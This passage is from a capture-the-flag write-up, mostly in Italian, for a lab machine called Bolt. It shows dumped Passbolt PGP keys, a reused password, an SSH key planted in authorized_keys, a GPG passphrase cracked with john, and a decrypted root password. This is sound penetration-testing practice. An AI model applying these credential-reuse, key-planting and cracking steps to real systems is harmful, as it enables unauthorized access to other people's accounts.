K9Mvu5Ow5PLC+EHv1Ve21bfKTE8sQbkhF7qaxoX3C47DReze7LGidk+DIPJx Gw2JeW/EukUAEQEAAcLAdgQYAQgACQUCYDgZfQIbDAAhCRBY7n73qDZg6hYh BA0fEAb51vFT6RQogFjufveoNmDqkwgH/Aup4vqEXUxqciTyIZUDctPY1I2v dwcMS1J9sjW8UOy3XzkgG2+ysME09fzODTM/zwpGEQf8icUvMOq70NMeUDed BnnVHlgwgn4W10xh8p6z24yBrU0iwRianGMX9bIzToHkxwhaj8AtQP5cXoZi x8/MFj+LswTfZDAP10CkgS4L3bsi7nIrh3sHMPjn2RYLIVXffWTDC4TJ2HV5 IadG59FrSdK+n8vXPNPcYUcm1F6ddDGvsxjBNwCX00jDNL3Gp7fPqKQjQCh0 pMIO+51kn9QRJJP/XmJrOw2mTheT20DT26JX/K947oi/pAe8xGHrCKAqWiZ5 AeAgt0l0AiCdPTQ= =axZz -----END PGP PUBLIC KEY BLOCK-----

bits: 2048 uid: Clark Griswold key_id: A83660EA fingerprint: 0D1F1006F9D6F153E914288058EE7EF7A83660EA type: RSA expires: NULL key_created: 2021-02-25 21:41:17 deleted: 0 created: 2021-02-25 21:41:14 modified: 2021-02-25 21:41:14

2.2.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0 2. row *

id: 929a2417-55d8-41fb-b0ce-b1b49839c5f2 user_id: 4e184ee6-e436-47fb-91c9-dccb57f250bc armored_key: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: OpenPGP.js v4.10.9 Comment: https://openpgpjs.org

xsBNBGA4G2EBCADbpIGoMv+O5sxsbYX3ZhkuikEiIbDL8JRvLX/r1KlhWlTi fjfUozTU9a0OLuiHUNeEjYIVdcaAR89lVBnYuoneAghZ7eaZuiLz+5gaYczk cpRETcVDVVMZrLlW4zhA9OXfQY/d4/OXaAjsU9w+8ne0A5I0aygN2OPnEKhU RNa6PCvADh22J5vD+/RjPrmpnHcUuj+/qtJrS6PyEhY6jgxmeijYZqGkGeWU +XkmuFNmq6km9pCw+MJGdq0b9yEKOig6/UhGWZCQ7RKU1jzCbFOvcD98YT9a If70XnI0xNMS4iRVzd2D4zliQx9d6BqEqZDfZhYpWo3NbDqsyGGtbyJlABEB AAHNHkVkZGllIEpvaG5zb24gPGVkZGllQGJvbHQuaHRiPsLAjQQQAQgAIAUC YDgbYQYLCQcIAwIEFQgKAgQWAgEAAhkBAhsDAh4BACEJEBwnQaPcO0q9FiEE 30Jrx6Sor1jlDtoOHCdBo9w7Sr35DQf9HZOFYE3yug2TuEJY7q9QfwNrWhfJ HmOwdM1kCKV5XnBic356DF/ViT3+pcWfIbWT8giYIZ/2qYfAd74S+gMKBim8 wBAH0J7WcnUI+py/zXxapGxBF0ufJtqrHmPaKsNaQVCEV3dDzTqlVRi0vfOD Cm6kt3E8f8GPYK9Mh21gPjnhoPE1s23NzmBUiDt6wjZ2dOQ2cVagVnf6PyHM WZLqUm8nQY342t3+AA6SFTw/YpwPPvjtZBBHf95BrSbpCE5Bjar9UyB+14x6 OUcWhkJu7QgySrCwAg2aKIBzsfWovcVTe9Rkpq/ty1tYOklT9kn75D9ttDF4 U8+Qz61kTICf987ATQRgOBthAQgAmlgcw3DqVzEBa5k9djPsUTJWOKVY5uox oBp6X0H9njR9Ufb2XtmxZUUdV/uhtbnM0lSlNkeNNBX4c/Qny88vfkgb66xc oOo4q+fNCEZfCmcS2AwMsUlzaPDQjowp4V+mWSc8JXq4GXOd/mrooibtiEdt vK4pzMdvwGCykFqugyRDLksc1hfDYU+s5R42TNiMdW7OwYAplnOjgExOH8f1 lXVkqbsq5p54TbHe+0SdlfH5pJf4Gfwqj6dQlkSf3DMeEnByxEZX3imeKGrC UmwLN4NHMeUs5EXuLnufut9aTMhbw/tetTtUXTHFk/zc7EhZDR1d3mkDV83c tEUh6BuElwARAQABwsB2BBgBCAAJBQJgOBthAhsMACEJEBwnQaPcO0q9FiEE 30Jrx6Sor1jlDtoOHCdBo9w7Sr3+HQf/Qhrj6znyGkLbj9uUv0S1Q5fFx78z 5qEXRe4rvFC3APYE8T5/AzW7XWRJxRxzgDQB5yBRoGEuL49w4/UNwhGUklb8 IOuffRTHMPZxs8qVToKoEL/CRpiFHgoqQ9dJPJx1u5vWAX0AdOMvcCcPfVjc PyHN73YWejb7Ji82CNtXZ1g9vO7D49rSgLoSNAKghJIkcG+GeAkhoCeU4BjC /NdSM65Kmps6XOpigRottd7WB+sXpd5wyb+UyptwBsF7AISYycPvStDDQESg pmGRRi3bQP6jGo1uP/k9wye/WMD0DrQqxch4lqCDk1n7OFIYlCSBOHU0rE/1 tD0sGGFpQMsI+Q== =+pbw -----END PGP PUBLIC KEY BLOCK-----

bits: 2048 uid: Eddie Johnson key_id: DC3B4ABD fingerprint: DF426BC7A4A8AF58E50EDA0E1C2741A3DC3B4ABD type: RSA expires: NULL key_created: 2021-02-25 21:49:21 deleted: 0 created: 2021-02-25 21:49:38 modified: 2021-02-25 21:49:38 2 rows in set (0.00 sec) #+end_example

2.2.4 mysql> select * from secrets \G

select * from secrets \G
         id: 643a8b12-c42c-4507-8646-2f8712af88f8
    user_id: 4e184ee6-e436-47fb-91c9-dccb57f250bc
resource_id: cd0270db-c83f-4f44-b7ac-76609b397746
       data: -----BEGIN PGP MESSAGE-----
Version: OpenPGP.js v4.10.9
Comment: https://openpgpjs.org

wcBMA/ZcqHmj13/kAQgAkS/2GvYLxglAIQpzFCydAPOj6QwdVV5BR17W5psc
g/ajGlQbkE6wgmpoV7HuyABUjgrNYwZGN7ak2Pkb+/3LZgtpV/PJCAD030kY
pCLSEEzPBiIGQ9VauHpATf8YZnwK1JwO/BQnpJUJV71YOon6PNV71T2zFr3H
oAFbR/wPyF6Lpkwy56u3A2A6lbDb3sRl/SVIj6xtXn+fICeHjvYEm2IrE4Px
l+DjN5Nf4aqxEheWzmJwcyYqTsZLMtw+rnBlLYOaGRaa8nWmcUlMrLYD218R
zyL8zZw0AEo6aOToteDPchiIMqjuExsqjG71CO1ohIIlnlK602+x7/8b7nQp
edLA7wF8tR9g8Tpy+ToQOozGKBy/auqOHO66vA1EKJkYSZzMXxnp45XA38+u
l0/OwtBNuNHreOIH090dHXx69IsyrYXt9dAbFhvbWr6eP/MIgh5I0RkYwGCt
oPeQehKMPkCzyQl6Ren4iKS+F+L207kwqZ+jP8uEn3nauCmm64pcvy/RZJp7
FUlT7Sc0hmZRIRQJ2U9vK2V63Yre0hfAj0f8F50cRR+v+BMLFNJVQ6Ck3Nov
8fG5otsEteRjkc58itOGQ38EsnH3sJ3WuDw8ifeR/+K72r39WiBEiE2WHVey
5nOF6WEnUOz0j0CKoFzQgri9YyK6CZ3519x3amBTgITmKPfgRsMy2OWU/7tY
NdLxO3vh2Eht7tqqpzJwW0CkniTLcfrzP++0cHgAKF2tkTQtLO6QOdpzIH5a
Iebmi/MVUAw3a9J+qeVvjdtvb2fKCSgEYY4ny992ov5nTKSH9Hi1ny2vrBhs
nO9/aqEQ+2tE60QFsa2dbAAn7QKk8VE2B05jBGSLa0H7xQxshwSQYnHaJCE6
TQtOIti4o2sKEAFQnf7RDgpWeugbn/vphihSA984
=P38i
-----END PGP MESSAGE-----

    created: 2021-02-25 21:50:11
   modified: 2021-03-06 15:34:36
1 row in set (0.00 sec)    

2.3 User flag (Eddie)

Per ottenere la user flag devo loggare come eddie utilizzando le stesse credenziali per accedere al db di passbolt

   rT2;jW7<eY8!dX8}pQ8%

Una volta loggati possiamo inserire la nostra chiave rsa con

(locale)

   ssh-keygen -t rsa -b 2048 -N ""

(remoto)

cd /home/eddie/.ssh/
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDTbhyjs7s605URqnLSDFBbpbZuGXghP8yZFGqie9FaFvGG+OdXNNcHe8pL6ZwRN1mC1l5KCq5og5CyjkV20WyG7O5ULWa85gJgv8WmzBcaBXfq3N75hEw2ndPKQ/8ZL1BUYMb1iOtCNzbPNXLU32S4gsv6ioNJQuZPnSY7kcoLhF8ugN1104b/LCztxWYj8+D4LTZS1blmwbMw2ZHT/j8J81BZam3r3TLHqapNcuAPrTbGnfUQmrK4kxjsxAxIt6UMh6LSOno7hjgsLRtlwhMG1fKcTSfKGJxWiEadCcTBDKM73Skde+ZbfgL8ktJsn+37wncwHn31j5ZxeET7dEzv leo@kali" > authorized_keys

(locale)

   ssh -i id_rsa eddie@bolt

2.4 Mail (Eddie)

   eddie@bolt:/var/mail$ cat eddie
From clark@bolt.htb  Thu Feb 25 14:20:19 2021
Return-Path: <clark@bolt.htb>
X-Original-To: eddie@bolt.htb
Delivered-To: eddie@bolt.htb
Received: by bolt.htb (Postfix, from userid 1001)
        id DFF264CD; Thu, 25 Feb 2021 14:20:19 -0700 (MST)
Subject: Important!
To: <eddie@bolt.htb>
X-Mailer: mail (GNU Mailutils 3.7)
Message-Id: <20210225212019.DFF264CD@bolt.htb>
Date: Thu, 25 Feb 2021 14:20:19 -0700 (MST)
From: Clark Griswold <clark@bolt.htb>

Hey Eddie,

The password management server is up and running.  Go ahead and download the extension to your browser and get logged in.  Be sure to back up your private key because I CANNOT recover it.  Your private key is the only way to recover your account.
Once you're set up you can start importing your passwords.  Please be sure to keep good security in mind - there's a few things I read about in a security whitepaper that are a little concerning...

-Clark

2.5 Cracking private key password

La chiave privata trovata nei file di google chrome prima di essere importanta con

gpg --allow-secret-key-import --import private_key.txt    

deve essere craccata con john perché presenta una passphrase. A tale fine si può eseguire

gpg2john private_key.txt > john_gpg_key
john john_gpg_key --wordlist=~/repos/wordlists/rockyou.txt    

Alla fine la password è:

   merrychristmas

2.6 Reading message

Una volta importanta la chiave privata di Eddie possiamo decifrare il messaggio che ci ha inviato Clark

leo@kali:~/repos/bolt/pgp$ gpg -d message.pgp 
gpg: encrypted with 2048-bit RSA key, ID F65CA879A3D77FE4, created 2021-02-25
      "Eddie Johnson <eddie@bolt.htb>"
{"password":"Z(2rmxsNW(Z?3=p/9s","description":""}gpg: Signature made Sat 06 Mar 2021 04:33:54 PM CET
gpg:                using RSA key 1C2741A3DC3B4ABD
gpg: Good signature from "Eddie Johnson <eddie@bolt.htb>" [unknown]
gpg: WARNING: This key is not certified with a trusted signature!
gpg:          There is no indication that the signature belongs to the owner.
Primary key fingerprint: DF42 6BC7 A4A8 AF58 E50E  DA0E 1C27 41A3 DC3B 4ABD

2.7 Root flag

Per diventare root basta utilizzare la password trovata prima

   Z(2rmxsNW(Z?3=p/9s